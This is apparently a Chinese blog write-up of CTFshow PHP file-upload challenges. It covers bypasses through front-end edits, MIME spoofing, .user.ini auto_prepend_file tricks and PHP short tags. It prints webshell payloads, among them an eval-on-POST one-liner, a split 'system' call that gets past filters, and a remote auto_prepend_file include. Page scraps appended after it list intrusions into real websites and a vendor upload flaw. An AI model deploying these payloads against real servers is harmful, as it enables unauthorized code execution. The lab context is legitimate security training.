Web安全--文件上传漏洞--通用漏洞--PHP

知识点:

1.文件上传--前端验证(如果是纯前端验证,那么我们可以直接检查元素修改代码即可绕过上传)

2.文件上传-黑白名单(意思就是网站设立黑白名单,允许上传什么类型文件等)

3.文件上传-.user.ini的妙用

4.文件上传-PHP语言特性

本文分享全部基于PHP的语言

详细点:

1.检测层面:前端,后端等

2.检测内容:文件头,完成性,二次渲染等

3.检测后缀:黑名单,白名单、MIME检测等

4.绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

前置知识点:这里给大家说明一个问题,因为我在学的时候也思考很久。假如我们上传后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外),如:我们上传后门文件格式为jpg,图片里边有后门代码,不能被触发,所以连接不上后门。

案例演示:CTFSHOW--文件上传

151:改关卡为纯前端验证,查看源代码允许上传png格式,我们直接修改为PHP后,直接上传php后门代码成功。

152:同上操作后提示文件类型不合规,我们简单抓包发现MIME检测,直接修改Content-Type: image/png,成功上传。

153:js验证+.user.ini

.user.ini不过多介绍自行百度,我们上传.user.ini文件,内容为auto_prepend_file=test.png,这句话什么意思呢?说白了这是将test.png当作代码执行,正如前期所说直接上传png图片后门是不会执行的,但是这里我们用到.user.ini后就能将图片后门当作代码执行。

154-155:js验证+.user.ini+短标签

我们知道php代码都有<?php?>这样的格式,那么不加标签要怎么运行php呢(因为过滤的php关键字段,我们不能写完整的代码,就得用到短标签绕过)

<? echo '123';?>                                             //前提是开启配置参数short_open_tags=on

<?=(表达式)?>                                               //不需要开启参数设置

<% echo '123';%>                                          //前提是开启配置参数asp_tags=on

<script language=”php”>echo '1'; </script>   //不需要修改参数开关

步骤:同上+短标签

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST[x]);?>

163 突破上传删除

过滤 . () {} ;等 同时文件被删除

直接利用.user.ini包含远程

auto_prepend_file=http://794750069/

auto_prepend_file=http://794750069/

解题方法:条件竞争可以解题但是这关不需要用到条件竞争。(当上传什么文件都删除时才用到条件竞争),条件竞争是没上传之前一直发包确保在上传成功后,在服务器没有删除之前访问到。

文件二次渲染:

1、判断上传前和上传后的文件大小及内容

2、判断上传后的文件返回数据包内容

164 png二次渲染(以后经常碰到的情况):意思就是上传的图片被网站加工处理,会把里边的代码进行修改,这就是二次渲染。

文件上传之二次渲染绕过_qq_40800734的博客-CSDN博客_图片二次渲染    (该网站是利用代码脚本生成渲染图片后门的,手工也可以自己生成但是有难度。但是脚本代码生成的图片也不是一定可以)

get 0=system

post 1=tac flag.php

168 免杀后门

<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>

这题是写不进去,当我们上传关键代码时会直接被删除(或者可以说写不进去),解决办法就是我们直接把关键的代码进行分割。

上传成功后直接访问该目录即可

 

 文件上传还有很多配合中间件的解析漏洞上传的,这里不再过多介绍。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
目录 第 1 部分拟研究技术专题 1.1《黑客攻防实战——web 漏洞挖掘与利用》图书 1.2 安天实战课题研究 2017 年第二期内网渗透技术题目 1.3 关于安天 365 线下和线下交流 1.4 已出版图书 第 2 部分技术研究文章 2.1 利用 phpcms 后台漏洞渗透某色情网站 2.1.1 扫描及分析端口信息 2.1.2 网站 cms 识别。 2.1.3 可利用信息分析和测试 2.1.4 端口信息测试 2.1.5phpsso_server 后台管理 2.1.6 获取 webshell 尝试 2.1.7 后续数据分析 2.1.8 总结 2.2 渗透某“高大尚”车友会网站 2.2.1 通过关键字寻找渗透目标 2.2.2.在论坛注册一个账号 2.2.3.编辑漏洞利用模板 2.2.4.获取管理密码加密等信息 2.2.5.获取数据库信息 2.2.6.进入管理后台 2.2.7.通过插件漏洞直接获取 webshell 2.3 获取并破解 windows 系统密码 2.3.1 获取系统 sam 和 system 文件 2.3.2 导入 sam 和 system 和文件 2.3.3 使用 ophcrack 进行密码破解 2.3.4 通过网站在线破解 2.4Mysql root 账号 general_log_file 方法获取 webshell 2.4.1 信息收集 2.4.2.获取 root 账号和密码 2.4.3.直接导出 webshell 失败 2.4.4. secure_file_priv 选项 2.4.5.通过 general_log 和 general_log_file 来获取 webshell 2.4.6.获取 webshell 2.4.7.服务器密码获取 2.4.8.获取远程终端端口 2.4.9.登录 3338 2.4.10.总结 2.5 从目录信息泄露到渗透内网 2.5.1.目录信息泄露 2.5.2.发现后台弱口令 2.5.3.泄露文件信息 2.5.4.发现数据库文件 2.5.5.发现涉及个人隐私的文件 2.5.6.发现上传文件模块 2.5.7.构造文件解析漏洞 2.5.8.获取数据库密码 2.5.9.MSSQL 数据库直接提权 2.5.10.使用 lcx 穿透进入内网 2.5.11.查看和扫描内网 2.5.12.利用已有信息进行渗透 2.5.13.目录信息泄露防范 2.6Acesss 数据库手工绕过通用代码防注入系统 2.6.1 获取目标信息 2.6.2 测试是否存在 SQL 注入 2.6.3 绕过 SQL 防注入系统 2.6.4 获取数据库类型以及表和字段 2.6.5 获取管理员密码 2.6.6.获取数据库 2.6.7access 数据库获取 webshell 方法 2.6.8 参考文章 2.7 网易 52G 邮箱帐号数据泄露追踪与还原 2.7.1 获取样本数据 2.7.2 查看样本数据 2.7.3 数据库还原 2.7.4 数据统计 2.7.5 结论与安全建议 2.7.6 参考文章 2.8WINDOWS 高危端口加固实践 2.8.1 屏蔽 135 端口 2.8.2 加固 137、138 和 139 端口 2.8.3445 端口加固 2.8.43389 端口加固 2.8.5 主机加固小结 2.9Linux(CentOS)之 iptables 访问控制 2.9.1 打开配置文件 2.9.2 添加新的放行端口 2.9.3 重启 iptables 使配置生效 2.9.4 查看端口开放情况 2.9.5 测试端口开放情况 2.9.6 小结
泛微e-cology前台文件上传漏洞是指在泛微e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于泛微e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [泛微e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [泛微E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值